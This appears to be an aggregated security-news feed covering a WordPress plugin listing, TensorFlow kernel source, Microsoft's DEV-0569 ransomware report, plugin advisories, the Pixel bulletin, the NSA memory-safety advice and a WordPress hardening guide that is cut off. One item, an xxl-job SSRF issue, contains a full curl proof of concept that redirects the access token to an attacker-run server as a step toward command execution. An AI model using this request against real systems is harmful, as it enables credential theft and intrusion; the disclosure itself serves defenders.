Unauth. Arbitrary File Download vulnerability in WatchTowerHQ plugin <= 3.6.15 on WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

WatchTowerHQ Website Monitoring: Done Right  
Fed up with using tools that get sold to GoDaddy, lose their founding team, and slowly die?  
Tired of half-assed customer service that takes 72-144 hours to get a response?  
Looking for one solution to cut the costs of many tools?  
Our founding team is intact and not only focused on a world-class customer service experience, we’re focused on making WatchTowerHQ the best tool agencies and companies turn to when managing multiple websites.

**Automated Updates**

Set it and forget it by scheduling WordPress theme and plugin updates in advance. Every Tuesday at 7am? Not a problem with WatchTowerHQ

**Performance Insights**

Wondering why no one stays on your website? It’s probably because it’s slow…like Ford Fiesta slow. Figure out what you need to do to transform it into the Porsche it deserves to be.

**Daily Backups**

Take them daily, store them for a year. Don’t be at the mercy of the intern who accidentally deleted all of your blog posts from the last 6 years. Restore them quickly from one of your backups. Automate these as you would like, or take them manually.

**Historical Data Tracking**

A snapshot in time is great for some. You’re not some. Most are like you, they want to see how data looks over time. Screen shots from last May? Easy peasy. Site speed today relative to 2 months ago? One click.

**Notifications?**

We’ve got you covered. You control who gets alerts, which alerts they get, and when. All for you to control within your account.

**Domain and SSL Registration Monitoring**

The dreaded call from a client at 12:47am when they realize their domain has expired and a 12 year old North Korean is holding it hostage for 72 BTC. Don’t let that happen to you or your clients. Always know when your domain or SSL certificate are about to expire so you can proactively renew.

**Real-time Uptime Monitoring**

Kiss false positives good-bye. Set your limits, get updated when they’re triggered.

**One-Click Access**

Access your WordPress site or staging environment with one click right from the website dashboard.  
WatchTowerHQ is the most robust website monitoring and management tool. Increase operational efficiency by eliminating wasted time, improving your security, and taking preventive action.

**Custom User Roles**

Select from one of WatchTowerHQ’s user roles with granular permissions selection or create custom roles to fit your organizational needs.

Please note that WatchTowerHQ tracks information about your site including:  
\* Domain information (Registrar, DNS, SSL, Blacklist Status, Site & Proxy IP addresses)  
\* WordPress plugins, themes, and core  
\* Google Lighthouse & Google Analytics data  
\* Screen captures  
\* CSS & JavaScript code

After installing the WatchTowerHQ plugin you will need to do a few things to start monitoring your site.  
1\. Activate the WatchTowerHQ plugin.  
2\. Copy the access token found in the WatchTowerHQ Settings (you will need this in a future step).  
3\. Go to WatchTowerHQ to sign up for an account.  
4\. Fill in information about your websites – including the access token that you’d copied earlier.  
5\. Save the website’s information once complete. Happy monitoring!

If you’ve already signed up on WatchTowerHQ, you can also follow the alternative installation:  
1\. Download the WatchTowerHQ client from the Settings dropdown menu  
2\. Go to the Plugins tab in WordPress and select “Add New Plugin”.  
3\. Click the “Upload Plugin” button and upload the zip file you downloaded from WatchTowerHQ.  
4\. Click to activate the client and copy the access token from the WatchTowerHQ settings.  
5\. Go to the “Add new website” form found on the Websites page of your WatchTowerHQ dashboard.  
6\. Select WordPress as your CMS and paste the access token in the space.

**Can I have multiple environments on WatchTowerHQ?**

Yes, you can include your development and other environments to your WatchTowerHQ account for convenient one-click access.

**What does WatchTowerHQ do with my site’s information?**

The information tracked by WatchTowerHQ is used to provide real-time analytics and alerts on your site’s status including vulnerabilities, site downtime, and performance. As well as to notify you about WordPress-specific issues such as abandoned plugins.

**How much is WatchTowerHQ?**

To view our plans and get started with WatchTowerHQ check out our website.

**Can I limit access to other users?**

We have a number of standard roles, that many users requested, along with that we’ve created custom user roles. With custom user roles the options are endless to the access that you can give any one user. Custom User roles are included in all plans at no additional cost.

It's packed with features. One of the best tools available to manage my websites.

Read all 1 review

“WatchTowerHQ” is open source software. The following people have contributed to this plugin.

Contributors

*    watchtowerhq

**3.6.20**

*   remove unused code

**3.6.19**

*   db backup fix

**3.6.18**

*   WordPress 6.1.x compatibility declaration update

**3.6.17**

*   Fix security issue

**3.6.16**

*   Fix security issue

**3.6.15**

*   Fix theme updates info

**3.6.13**

*   Fix plugin updates info

**3.6.12**

*   Fix plugin slug

**3.6.11**

*   Fix plugin slug

**3.6.10**

*   WP 6.x compatibility declaration

**3.6.7**

*   WP 5.9.x compatibility declaration

**3.6.6**

*   fix open basedir warnings

**3.6.1**

*   Add endpoint for removing database backup file

**3.6.0**

*   updated action scheduler

**3.5.69**

*   WP Engine – exception

**3.5.67**

*   code improvements

**3.5.65**

*   code improvements
*   fetch info about debug log

**3.5.1**

*   update action scheduler

**3.5.0**

*   new backup system

**3.4.16**

*   WordPress 5.8 compatibility

**3.4.15**

*   fix UI issue

**3.4.13**

*   better settings UI

**3.4.12**

*   allow resume downloading backup
*   include backup integrity checksum to confirm error free transfer

**3.4.10**

*   code refactoring

**3.4.9**

*   update composer properties

**3.4.8**

*   WordPress 5.7 compatibility

**3.4.4**

*   new backup queue file limits

**3.4.2**

*   increase timeout

**3.4.0**

*   added ZipArchive fallback

**3.3.10**

*   fix curl timeout

**3.3.7**

*   minimum PHP version: 7.1

**3.3.6**

*   readme improvements

**3.3.0**

*   WordPress.org first release.
*   removed custom updates library

CVE-2022-44583: WatchTowerHQ

Auth. (subscriber+) Cross-Site Scripting (XSS) vulnerability in Soledad premium theme <= 8.2.5 on WordPress.

CVE-2022-41788: Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme

TensorFlow is an open source platform for machine learning. When `tf.raw_ops.ImageProjectiveTransformV2` is given a large output shape, it overflows. We have patched the issue in GitHub commit 8faa6ea692985dbe6ce10e1a3168e0bd60a723ba. The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.


/\* Copyright 2020 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. \==============================================================================\*/ #define EIGEN\_USE\_THREADS #if GOOGLE\_CUDA #define EIGEN\_USE\_GPU #endif // GOOGLE\_CUDA #include "tensorflow/core/kernels/image/image\_ops.h" #include "tensorflow/core/framework/op\_kernel.h" #include "tensorflow/core/framework/register\_types.h" #include "tensorflow/core/framework/types.h" #include "tensorflow/core/platform/types.h" namespace tensorflow { namespace functor { // Explicit instantiation of the CPU functor. typedef Eigen::ThreadPoolDevice CPUDevice; template struct FillProjectiveTransform<CPUDevice, uint8>; template struct FillProjectiveTransform<CPUDevice, int32>; template struct FillProjectiveTransform<CPUDevice, int64\_t\>; template struct FillProjectiveTransform<CPUDevice, Eigen::half>; template struct FillProjectiveTransform<CPUDevice, float\>; template struct FillProjectiveTransform<CPUDevice, double\>; } // end namespace functor typedef Eigen::ThreadPoolDevice CPUDevice; using functor::FillProjectiveTransform; using generator::Interpolation; using generator::Mode; template <typename Device, typename T> void DoImageProjectiveTransformOp(OpKernelContext\* ctx, const Interpolation& interpolation, const Mode& fill\_mode) { const Tensor& images\_t = ctx->input(0); const Tensor& transform\_t = ctx->input(1); OP\_REQUIRES(ctx, images\_t.shape().dims() == 4, errors::InvalidArgument("Input images must have rank 4")); OP\_REQUIRES(ctx, (TensorShapeUtils::IsMatrix(transform\_t.shape()) && (transform\_t.dim\_size(0) == images\_t.dim\_size(0) || transform\_t.dim\_size(0) == 1) && transform\_t.dim\_size(1) == 8), errors::InvalidArgument( "Input transform should be num\_images x 8 or 1 x 8")); int32\_t out\_height, out\_width; // Kernel is shared by legacy "ImageProjectiveTransform" op with 2 args. if (ctx->num\_inputs() >= 3) { const Tensor& shape\_t = ctx->input(2); OP\_REQUIRES(ctx, shape\_t.dims() == 1, errors::InvalidArgument("output shape must be 1-dimensional", shape\_t.shape().DebugString())); OP\_REQUIRES(ctx, shape\_t.NumElements() == 2, errors::InvalidArgument("output shape must have two elements", shape\_t.shape().DebugString())); auto shape\_vec = shape\_t.vec<int32>(); out\_height = shape\_vec(0); out\_width = shape\_vec(1); OP\_REQUIRES(ctx, out\_height > 0 && out\_width > 0, errors::InvalidArgument("output dimensions must be positive")); } else { // Shape is N (batch size), H (height), W (width), C (channels). out\_height = images\_t.shape().dim\_size(1); out\_width = images\_t.shape().dim\_size(2); } T fill\_value(0); // Kernel is shared by "ImageProjectiveTransformV2" with 3 args. if (ctx->num\_inputs() >= 4) { const Tensor& fill\_value\_t = ctx->input(3); OP\_REQUIRES(ctx, TensorShapeUtils::IsScalar(fill\_value\_t.shape()), errors::InvalidArgument("fill\_value must be a scalar", fill\_value\_t.shape().DebugString())); fill\_value = static\_cast<T>(\*(fill\_value\_t.scalar<float\>().data())); } Tensor\* output\_t; TensorShape output\_shape; OP\_REQUIRES\_OK( ctx, TensorShape::BuildTensorShape({images\_t.dim\_size(0), out\_height, out\_width, images\_t.dim\_size(3)}, &output\_shape)); OP\_REQUIRES\_OK(ctx, ctx->allocate\_output(0, output\_shape, &output\_t)); auto output = output\_t\->tensor<T, 4\>(); auto images = images\_t.tensor<T, 4\>(); auto transform = transform\_t.matrix<float\>(); (FillProjectiveTransform<Device, T>(interpolation))( ctx->eigen\_device<Device>(), &output, images, transform, fill\_mode, fill\_value); } template <typename Device, typename T> class ImageProjectiveTransformV2 : public OpKernel { private: Interpolation interpolation\_; Mode fill\_mode\_; public: explicit ImageProjectiveTransformV2(OpKernelConstruction\* ctx) : OpKernel(ctx) { string interpolation\_str; OP\_REQUIRES\_OK(ctx, ctx->GetAttr("interpolation", &interpolation\_str)); if (interpolation\_str == "NEAREST") { interpolation\_ = Interpolation::NEAREST; } else if (interpolation\_str == "BILINEAR") { interpolation\_ = Interpolation::BILINEAR; } else { LOG(ERROR) << "Invalid interpolation " << interpolation\_str << ". Supported types: NEAREST, BILINEAR"; } string mode\_str; OP\_REQUIRES\_OK(ctx, ctx->GetAttr("fill\_mode", &mode\_str)); if (mode\_str == "REFLECT") { fill\_mode\_ = Mode::FILL\_REFLECT; } else if (mode\_str == "WRAP") { fill\_mode\_ = Mode::FILL\_WRAP; } else if (mode\_str == "CONSTANT") { fill\_mode\_ = Mode::FILL\_CONSTANT; } else if (mode\_str == "NEAREST") { fill\_mode\_ = Mode::FILL\_NEAREST; } else { LOG(ERROR) << "Invalid mode " << mode\_str << ". Supported types: REFLECT, WRAP, CONSTANT, NEAREST"; } } void Compute(OpKernelContext\* ctx) override { DoImageProjectiveTransformOp<Device, T>(ctx, interpolation\_, fill\_mode\_); } }; #define REGISTER(TYPE) \\ REGISTER\_KERNEL\_BUILDER(Name("ImageProjectiveTransformV2") \\ .Device(DEVICE\_CPU) \\ .TypeConstraint<TYPE>("dtype"), \\ ImageProjectiveTransformV2<CPUDevice, TYPE>) TF\_CALL\_uint8(REGISTER); TF\_CALL\_int32(REGISTER); TF\_CALL\_int64(REGISTER); TF\_CALL\_half(REGISTER); TF\_CALL\_float(REGISTER); TF\_CALL\_double(REGISTER); #undef REGISTER template <typename Device, typename T> class ImageProjectiveTransformV3 : public ImageProjectiveTransformV2<Device, T> { public: explicit ImageProjectiveTransformV3(OpKernelConstruction\* ctx) : ImageProjectiveTransformV2<Device, T>(ctx) {} }; #define REGISTER(TYPE) \\ REGISTER\_KERNEL\_BUILDER(Name("ImageProjectiveTransformV3") \\ .Device(DEVICE\_CPU) \\ .TypeConstraint<TYPE>("dtype"), \\ ImageProjectiveTransformV3<CPUDevice, TYPE>) TF\_CALL\_uint8(REGISTER); TF\_CALL\_int32(REGISTER); TF\_CALL\_int64(REGISTER); TF\_CALL\_half(REGISTER); TF\_CALL\_float(REGISTER); TF\_CALL\_double(REGISTER); #undef REGISTER #if GOOGLE\_CUDA typedef Eigen::GpuDevice GPUDevice; typedef generator::Mode Mode; namespace functor { // NOTE(ringwalt): We get an undefined symbol error if we don't explicitly // instantiate the operator() in GCC'd code. #define DECLARE\_PROJECT\_FUNCTOR(TYPE) \\ template <> \\ void FillProjectiveTransform<GPUDevice, TYPE>::operator()( \\ const GPUDevice& device, OutputType\* output, const InputType& images, \\ const TransformsType& transform, const Mode fill\_mode, \\ const TYPE fill\_value) const; \\ extern template struct FillProjectiveTransform<GPUDevice, TYPE> TF\_CALL\_uint8(DECLARE\_PROJECT\_FUNCTOR); TF\_CALL\_int32(DECLARE\_PROJECT\_FUNCTOR); TF\_CALL\_int64(DECLARE\_PROJECT\_FUNCTOR); TF\_CALL\_half(DECLARE\_PROJECT\_FUNCTOR); TF\_CALL\_float(DECLARE\_PROJECT\_FUNCTOR); TF\_CALL\_double(DECLARE\_PROJECT\_FUNCTOR); } // end namespace functor namespace generator { #define DECLARE\_MAP\_FUNCTOR(Mode) \\ template <> \\ float MapCoordinate<GPUDevice, Mode>::operator()(const float out\_coord, \\ const DenseIndex len); \\ extern template struct MapCoordinate<GPUDevice, Mode> DECLARE\_MAP\_FUNCTOR(Mode::FILL\_REFLECT); DECLARE\_MAP\_FUNCTOR(Mode::FILL\_WRAP); DECLARE\_MAP\_FUNCTOR(Mode::FILL\_CONSTANT); DECLARE\_MAP\_FUNCTOR(Mode::FILL\_NEAREST); } // end namespace generator #define REGISTER(TYPE) \\ REGISTER\_KERNEL\_BUILDER(Name("ImageProjectiveTransformV2") \\ .Device(DEVICE\_GPU) \\ .TypeConstraint<TYPE>("dtype") \\ .HostMemory("output\_shape"), \\ ImageProjectiveTransformV2<GPUDevice, TYPE>) TF\_CALL\_uint8(REGISTER); TF\_CALL\_int32(REGISTER); TF\_CALL\_int64(REGISTER); TF\_CALL\_half(REGISTER); TF\_CALL\_float(REGISTER); TF\_CALL\_double(REGISTER); #undef REGISTER #define REGISTER(TYPE) \\ REGISTER\_KERNEL\_BUILDER(Name("ImageProjectiveTransformV3") \\ .Device(DEVICE\_GPU) \\ .TypeConstraint<TYPE>("dtype") \\ .HostMemory("output\_shape") \\ .HostMemory("fill\_value"), \\ ImageProjectiveTransformV3<GPUDevice, TYPE>) TF\_CALL\_uint8(REGISTER); TF\_CALL\_int32(REGISTER); TF\_CALL\_int64(REGISTER); TF\_CALL\_half(REGISTER); TF\_CALL\_float(REGISTER); TF\_CALL\_double(REGISTER); #undef REGISTER #endif // GOOGLE\_CUDA } // end namespace tensorflow

CVE-2022-41886: tensorflow/image_ops.cc at master · tensorflow/tensorflow

Although the group relies on good old phishing to deliver Royal ransomware, researchers say DEV-0569 regularly uses new and creative discovery techniques to lure victims.

It generally starts with malvertising and ends with the deployment of Royal ransomware, but a new threat group has distinguished itself by its ability to innovate the malicious steps in between to lure in new targets.

The cyberattack group, tracked by Microsoft Security Threat Intelligence as DEV-0569, is notable for its ability to continuously improve its discovery, detection evasion, and post-compromise payloads, according to a report this week from the computing giant.

"DEV-0569 notably relies on malvertising, phishing links that point to a malware downloader posing as software installers or updates embedded in spam emails, fake forum pages, and blog comments," the Microsoft researchers said.

In just a few months, the Microsoft team observed the group's innovations, including hiding malicious links on organizations' contact forms; burying fake installers on legitimate download sites and repositories; and using Google ads in its campaigns to camouflage its malicious activities.

"DEV-0569 activity uses signed binaries and delivers encrypted malware payloads," the Microsoft team added. "The group, also known to rely heavily on defense evasion techniques, has continued to use the open-source tool Nsudo to attempt disabling antivirus solutions in recent campaigns."

The group's success positions DEV-0569 to serve as an access broker for other ransomware operations, Microsoft Security said.

**How to Combat Cyberattack Ingenuity**

New tricks aside, Mike Parkin, senior technical engineer at Vulcan Cyber, points out the threat group indeed makes adjustments along the edges of their campaign tactics, but consistently relies on users to make mistakes. Thus, for defense, user education is the key, he says.

"The phishing and malvertising attacks reported here rely entirely on getting users to interact with the lure," Parkin tells Dark Reading. "Which means that if the user doesn't interact, there is no breach."

He adds, "Security teams need to stay ahead of the latest exploits and malware being deployed in the wild, but there is still an element of user education and awareness that's required, and will always be required, to turn the user community from the main attack surface into a solid line of defense."

Making users impervious to lures certainly sounds like a solid strategy, but Chris Clements, vice president of solutions architecture at Cerberus Sentinel, tells Dark Reading it's "both unrealistic and unfair" to expect users to maintain 100% vigilance in the face of increasingly convincing social engineering ploys. Instead, a more holistic approach to security is required, he explains.

"It falls then to the technical and cybersecurity teams at an organization to ensure that a compromise of a single user doesn't lead to widespread organizational damage from the most common cybercriminal goals of mass data theft and ransomware," Clements says.

**IAM Controls Matter**

Robert Hughes, CISO at RSA, recommends starting with identity and access management (IAM) controls.

"Strong identity and access governance can help control the lateral spread of malware and limit its impact, even after a failure at the human and endpoint malware prevention level, such as stopping authorized individual from clicking on a link and installing software that they are allowed to install," Hughes tells Dark Reading. "Once you've ensured that your data and identities are safe, the fallout of a ransomware attack won't be as damaging — and it won't be as much of an effort to re-image an endpoint."

Phil Neray from CardinalOps agrees. He explains that tactics like malicious Google Ads are tough to defend against, so security teams must also focus on minimizing fallout once a ransomware attack occurs.

"That means making sure the SoC has detections in place for suspicious or unauthorized behavior, such as privilege escalation and the use of living-off-the-land admin tools like PowerShell and remote management utilities," Neray says.

DEV-0569 Ransomware Group Remarkably Innovative, Microsoft Cautions

Broken Access Control vulnerability in miniOrange's Google Authenticator plugin <= 5.6.1 on WordPress.

 Verified

 Fixed

**5.4**

CVSS 3.1 score Medium severity

Report  

Monitoring Not reported to be exploited

Vulnerable versions

<= 5.6.1

PSID 

a637b68a17fd

Classification 

Other Vulnerability Type

OWASP Top 10 

A5: Broken Access Control

Required privilege 

Requires subscriber or higher role user authentication.

Publicly disclosed

2022-10-31

**Details**

Broken Access Control vulnerability leading to Plugin Settings Change discovered by Lana Codes (Patchstack Alliance) in WordPress miniOrange's Google Authenticator plugin (versions <= 5.6.1).

**Solution**

Update the WordPress miniOrange's Google Authenticator plugin to the latest available version (at least 5.6.2).

**References**

CVE-2022-42461: WordPress miniOrange's Google Authenticator plugin <= 5.6.1 - Broken Access Control vulnerability - Patchstack

Languages such as C and C++ rely too heavily on the programmer not making simple memory-related security errors.

Security analysts welcomed a recommendation from the US National Security Agency (NSA) last week for software developers to consider adopting languages, such as C#, Go, Java, Ruby, Rust, and Swift, that reduce memory-related vulnerabilities in code.

The NSA described these as "memory-safe" languages that manage memory automatically as part of the computer language. They do not rely on the programmer to implement memory security and instead use a combination of compile time and runtime checks to protect against memory errors, the NSA said.

**The Case for Memory-Safe Languages**

The NSA's somewhat unusual advisory on Nov. 10 pointed to widely used languages such as C and C++ as relying too heavily on programmers not to make memory-related mistakes, which it noted continues to be the top cause for security vulnerabilities in software. Previous studies — one by Microsoft in 2019 and another from Google in 2020 related to its Chrome browser, for instance — found 70% of vulnerabilities were memory-safety issues, the NSA said.

"Commonly used languages, such as C and C++, provide a lot of freedom and flexibility in memory management while relying heavily on the programmer to perform the needed checks on memory references," the NSA said. This often results in exploitable vulnerabilities tied to simple mistakes such as buffer overflow errors, memory allocation issues, and race conditions.

C#, Go, Java, Ruby, Rust, Swift, and other memory-safe languages do not completely eliminate the risk of these issues, the NSA said in its advisory. Most of them, for instance, include at least a few classes or functions that aren't memory-safe and allow the programmer to perform a potentially unsafe memory management function. Memory-safe languages can sometimes also include libraries written in languages that contain potentially unsafe memory functions.

But even with these caveats, memory-safe languages can help reduce vulnerabilities in software resulting from poor and careless memory management, the NSA said.

Tim Mackey, principal security strategist at Synopsys Cybersecurity Research Center, welcomes the NSA's recommendation. The use of memory-safe languages should, in fact, be the default for most applications, he says.

"For practical purposes, relying on developers to focus on memory management issues instead of programming cool, new features represents a tax on innovation," he says.

With memory-safe programming languages and associated frameworks, it is the authors of the language that ensure proper memory management and not the application developers, Mackey says.

**Shift Can Be Challenging**

Shifting a mature software development environment from one language to another can be hard, the NSA acknowledged. Programmers will need to learn the new language, and there are likely going to be newbie mistakes and efficiency hits during the process. The extent of memory security that is available can also vary significantly by language. Some might offer only minimal memory security, while others offer considerable protections around memory access, allocation, and management.

In addition, organizations will need to consider how much of a tradeoff they are willing to make between security and performance. "Memory safety can be costly in performance and flexibility," the NSA warned. "For languages with an extreme level of inherent protection, considerable work may be needed to simply get the program to compile due to the checks and protections."

Myriad variables are in play when trying to port an application from one language to another, says Mike Parkin, senior technical engineer at Vulcan Cyber.

"In a best-case scenario, the shift is simple and an organization can accomplish it relatively painlessly," Parkin says. "In others, the application relies on features that are trivial in the original language but require extensive and expensive development to re-create in the new one."

The use of memory-safe languages also doesn't replace the need for proper software testing, Mackey cautions. Just because a programming language is memory-safe doesn't mean the language or applications developed on it are free from bugs.

Moving from one programming language to another is a risky proposition unless you have staff that already understands both the old language and the new one, Mackey says.

"Such a migration is best done when the application is going through a major version update," he notes. "Otherwise there is the potential that inadvertent bugs are introduced as part of the migration effort."

Mackey suggests that organizations consider using microservices when it comes to shifting languages.

"With a microservices architecture, the application is decomposed into a set of services that are containerized," Mackey says. "From the perspective of a programming language, there is nothing that inherently requires that each microservice be programmed in the same programming language as other services within the same application."

**Making the Move**

Recent data from Statista shows that many developers are already using languages that are considered memory-safe. For instance, nearly two-thirds (65.6%) use JavaScript, nearly half (48.06%) use Python, one-third use Java, and nearly 28% use C#. At the same time, a substantial proportion are still using unsafe languages, such as C++ (22.5%) and C (19.25%).

"I think many organizations have already been switching away from C/C++ not only for the memory-safety issue, but also for the overall ease of development and maintenance," says Johannes Ullrich, dean of research at the SANS Technology Institute. "But there will still be legacy code bases that will have to be maintained for many years to come."

NSA's advisory offered little insight into what might have prompted its recommendation at this juncture. But John Bambenek, principal threat hunter at Netenrich, advises organizations not to ignore it.

"Memory vulnerabilities and attacks have been pervasive since the 1990s, so in general, this is good advice," he says. "With that being said, as this is coming from the NSA, I believe this advice should take added urgency and is being driven by knowledge they have and we don't."

Analysts Welcome NSA's Advice for Developers to Adopt Memory-Safe Languages

In shared_metadata_init of SharedMetadata.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239415718References: N/A

_Published November 8, 2022 | Updated November 9, 2022_

The Pixel Update Bulletin contains details of security vulnerabilities and functional improvements affecting supported Pixel devices (Google devices). For Google devices, security patch levels of 2022-11-05 or later address all issues in this bulletin and all issues in the November 2022 Android Security Bulletin. To learn how to check a device's security patch level, see Check and update your Android version.

All supported Google devices will receive an update to the 2022-11-05 patch level. We encourage all customers to accept these updates to their devices.

**Announcements**

*   In addition to the security vulnerabilities described in the November 2022 Android Security Bulletin, Google devices also contain patches for the security vulnerabilities described below.

**Security patches**

Vulnerabilities are grouped under the component that they affect. There is a description of the issue and a table with the CVE, associated references, type of vulnerability, severity, and updated Android Open Source Project (AOSP) versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Pixel**

    

CVE

References

Type

Severity

Subcomponent

CVE-2022-20427

A-239555070 \*

EoP

Critical

Titan M

CVE-2022-20428

A-239555411 \*

EoP

High

Titan M

CVE-2022-20459

A-239556260 \*

EoP

High

Titan M

CVE-2022-20460

A-239557547 \*

EoP

High

Titan M

CVE-2022-42533

A-239415718 \*

EoP

High

gralloc4

**Qualcomm closed-source components**

   

CVE

References

Severity

Subcomponent

CVE-2022-25674

A-231226928 \*

Moderate

Closed-source component

CVE-2022-25676

A-231226556 \*

Moderate

Closed-source component

CVE-2022-25679

A-215246183 \*

Moderate

Closed-source component

**Functional patches**

For details on the new bug fixes and functional patches included in this release, refer to the Pixel Community forum.

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

Security patch levels of 2022-11-05 or later address all issues associated with the 2022-11-05 security patch level and all previous patch levels. To learn how to check a device's security patch level, read the instructions on the Google device update schedule.

**2\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**3\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**4\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the Android bug ID in the _References_ column. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**5\. Why are security vulnerabilities split between this bulletin and the Android Security Bulletins?**

Security vulnerabilities that are documented in the Android Security Bulletins are required to declare the latest security patch level on Android devices. Additional security vulnerabilities, such as those documented in this bulletin are not required for declaring a security patch level.

**Versions**

  

Version

Date

Notes

1.0

November 7, 2022

Bulletin Published

1.1

November 9, 2022

Bulletin Updated

CVE-2022-42533: Pixel Update Bulletin—November 2022  |  Android Open Source Project

XXL-Job before v2.3.1 contains a Server-Side Request Forgery (SSRF) via the component /admin/controller/JobLogController.java.

xxl-job =< 2.3.1 version (latest version) has SSRF vulnerability, which causes low-privileged users to control executor to execute arbitrary commands

1.  Vulnerability description  
    XXL-JOB is a distributed task scheduling platform based on java language in the XXL (XXL-JOB) community.  
    There is an SSRF vulnerability in xxl-job-2.3.1/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobLogController.java of Xxl-job 2.3.1, which originates from /logDetailCat, it directly sends a query log request to the address specified by executorAddress without judging whether the executorAddress parameter is the valid executor address. The query request will have the XXL-JOB-ACCESS- TOKEN, resulting in the leakage of XXL-JOB-ACCESS-TOKEN, and then the attacker obtains XXL-JOB-ACCESS-TOKEN and calls any executor, causing the execution of arbitrary commands of the executor.  
    The /logDetailCat interface call only needs to be a low Privilege user of the platform。

2.Affected version  
Xxl-job-admin =< 2.3.1 （latest）

3.Proof of concept  
1、build an http server locally and print the http request header log.  
  
2、Create a normal user normal without any executor permissions。  
  
  
3、When using the normal user to call the interface, set the input parameter executor Address to the http server address in step 1, and print the XXL-JOB-ACCESS-TOKEN directly on the target server  
curl 'http://localhost:8080/xxl-job-admin/joblog/logDetailCat' \ -H 'Accept: application/json, text/javascript, */*; q=0.01' \ -H 'Accept-Language: zh-CN,zh;q=0.9' \ -H 'Connection: keep-alive' \ -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \ -H 'Cookie: Idea-6a85f0b8=3349f800-77dc-4e25-a562-885457beb2aa; XXL_JOB_LOGIN_IDENTITY=7b226964223a322c22757365726e616d65223a226e6f726d616c222c2270617373776f7264223a223563373066666266643839303065626533643037326562346162353064376162222c22726f6c65223a302c227065726d697373696f6e223a22227d' \ -H 'Origin: http://localhost:8080' \ -H 'Referer: http://localhost:8080/xxl-job-admin/' \ -H 'Sec-Fetch-Dest: empty' \ -H 'Sec-Fetch-Mode: cors' \ -H 'Sec-Fetch-Site: same-origin' \ -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36' \ -H 'X-Requested-With: XMLHttpRequest' \ -H 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"' \ -H 'sec-ch-ua-mobile: ?0' \ -H 'sec-ch-ua-platform: "macOS"' \ --data-raw 'executorAddress=http://10.224.203.118&logId=0&fromLineNum=0&triggerTime=1586629003729' \ --compressed   
  

4、Use the token to call the task trigger interface of the executor Restful API to execute arbitrary commands  

4、Recommendations  
The same as in JobLogController.java, when matching the /joblog route, it will enter the index method to judge whether the 'executorAddress executor address belongs to the executor address.

CVE-2022-43183: xxl-job =< 2.3.1 version (latest version) has SSRF vulnerability, which causes low-privileged users to control executor to execute arbitrary commands · Issue #3002 · xuxueli/xxl-job

By Waqas
The most prominent CMS today is WordPress which is being used by over 455 million across the globe.
This is a post from HackRead.com Read the original post: Step-by-Step Security Guide for WordPress

As the internet becomes increasingly integral to daily life, website security is more important than ever. Hackers can gain access to sensitive information, like credit card numbers and social security numbers, through websites with weak security. This can lead to identity theft and financial fraud.

Your website’s CMS (content management system) works as the backbone of your entire setup. The most prominent CMS today is WordPress which is being used by over 455 million across the globe. Naturally, WordPress is a lucrative target for cybercriminals and highlights the fact why WordPress security should never be ignored.

WordPress or another other CMS, while 100% security may be a myth, there are a few things you can do to ensure your website is secure from external and internal threats.

**Secure Hosting**

A website is a powerful tool that can help businesses of all sizes reach new customers and grow. However, a website is only as secure as the hosting provider that it uses. That’s why it’s important to choose a secure website hosting provider when setting up your website. Here are two things to look for in a secure website hosting provider:

**1. Industry-Leading Security Measures:** A good web hosting provider will have industry-leading security measures in place to protect your website from hackers and other online threats. This includes things like firewalls, DDoS protection, and malware scanning.

**2. Regular Backups:** In the event that your website is hacked or compromised, regular backups will ensure that you can quickly restore your site to its previous state. A good web hosting provider will perform regular backups of your site automatically.

**Strengthening Login Credentials**

According to studies, around 8 percent of hacked WordPress websites are due to weak passwords. However, as the largest self-hosted blogging tool in the world, WordPress has a responsibility to its users to keep their information safe. One way it does this is by natively offering two-factor authentication (2FA).

Two-factor authentication is an extra layer of security that requires not only a username and password but also something that the user has on them, like a phone. This makes it much harder for someone to hack into a WordPress account, even if they have the login credentials.

WordPress offers 2FA through several different methods, including SMS text messages, email, and authenticator apps. Which method you choose is up to you, but we recommend using an authenticator app like Authy or Google Authenticator.

**Updated Plugins**

The reason why WordPress powers millions of websites and blogs is its user-friendliness and free plugins. Although WordPress is good at adding new features and constantly issues security patches, zero-day vulnerabilities can be a calamity.

Therefore, always keep your plugins up to date because newer versions of plugins often fix security vulnerabilities that older versions had. Outdated plugins can cause compatibility issues with other plugins or with WordPress itself.

Additionally, newer versions of plugins usually have new features and improvements that can make your site run better. So next time you see a plugin update available, don’t ignore it – go ahead and update!

**Hiding WordPress Login URL**

